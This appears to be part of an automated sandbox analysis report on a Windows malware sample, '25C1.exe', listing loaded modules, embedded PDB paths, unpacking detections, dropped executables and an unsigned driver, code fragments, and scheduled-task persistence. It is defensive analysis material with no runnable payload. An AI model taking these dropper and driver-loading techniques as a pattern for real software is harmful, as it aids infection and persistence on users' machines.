                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Desktop\25C1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeWindow found: window name: TButtonJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\25C1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: 25C1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: 25C1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: 25C1.exeStatic file information: File size 9104384 > 1048576
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                        Source: 25C1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x8ae200
                        Source: 25C1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\xericuzakiziy64\dayolev xadesowip kijo.pdbT source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000000.1358564663.0000000000807000.00000002.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000000.1462221086.0000000000807000.00000002.00000001.01000000.00000006.sdmp
                        Source: Binary string: Loader.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: EfiGuardDxe.pdb7 source: 288c47bbc1871b439df19ff4df68f076.exe
                        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: symsrv.pdb source: 288c47bbc1871b439df19ff4df68f076.exe
                        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Unable to locate the .pdb file in this location source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: The module signature does not match with .pdb signature. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: .pdb.dbg source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: '(EfiGuardDxe.pdbx source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: symsrv.pdbGCTL source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003ED8000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000035E9000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000C7A000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\xericuzakiziy64\dayolev xadesowip kijo.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000000.1358564663.0000000000807000.00000002.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000000.1462221086.0000000000807000.00000002.00000001.01000000.00000006.sdmp
                        Source: Binary string: or you do not have access permission to the .pdb location. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: EfiGuardDxe.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: dbghelp.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: dbghelp.pdbGCTL source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Detected unpacking (changes PE section rights)
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                        Detected unpacking (overwrites its own PE header)
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack
                        Source: 288c47bbc1871b439df19ff4df68f076.exe.0.drStatic PE information: real checksum: 0x420b8d should be: 0x42c6e2
                        Source: vueqjgslwynd.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                        Source: BroomSetup.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x4cbbf8
                        Source: FourthX.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                        Source: InstallSetup4.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x20eded
                        Source: 25C1.exeStatic PE information: real checksum: 0x0 should be: 0x8be514
                        Source: INetC.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x69a0
                        Source: FourthX.exe.0.drStatic PE information: section name: .00cfg
                        Source: BroomSetup.exe.3.drStatic PE information: section name: .didata
                        Source: vueqjgslwynd.exe.4.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 2_2_02834C85 pushad ; ret 2_2_02834C97
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 2_2_02834D61 pushad ; ret 2_2_02834D88
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 2_2_0283216B pushfd ; ret 2_2_028321B3
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeCode function: 4_2_00007FF69A531394 push qword ptr [00007FF69A53A004h]; ret 4_2_00007FF69A531403
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeCode function: 27_2_00007FF7EE4A1394 push qword ptr [00007FF7EE4AA004h]; ret 27_2_00007FF7EE4A1403
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 32_2_029A2C85 pushad ; ret 32_2_029A2C97
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 32_2_029A016B pushfd ; ret 32_2_029A01B3
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 32_2_029A2D61 pushad ; ret 32_2_029A2D88
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 32_1_00404EBD push ecx; ret 32_1_00404ED0
                        Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000000140001394 push qword ptr [0000000140009004h]; ret 37_2_0000000140001403
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 41_2_009842C8 push ebx; ret 41_2_009842DA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 41_2_00985900 push esp; ret 41_2_00985909
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 41_2_00983AD9 push ebx; retf 41_2_00983ADA

                        Persistence and Installation Behavior

                        barindex
                        Sample is not signed and drops a device driver
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeFile created: C:\Windows\TEMP\gbfbijmbpkdw.sys
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeFile created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeJump to dropped file
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeFile created: C:\Windows\Temp\gbfbijmbpkdw.sysJump to dropped file
                        Source: C:\Users\user\Desktop\25C1.exeFile created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                        Source: C:\Users\user\Desktop\25C1.exeFile created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeJump to dropped file
                        Source: C:\Users\user\Desktop\25C1.exeFile created: C:\Users\user\AppData\Local\Temp\FourthX.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\INetC.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeFile created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeJump to dropped file
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeFile created: C:\Windows\Temp\gbfbijmbpkdw.sysJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
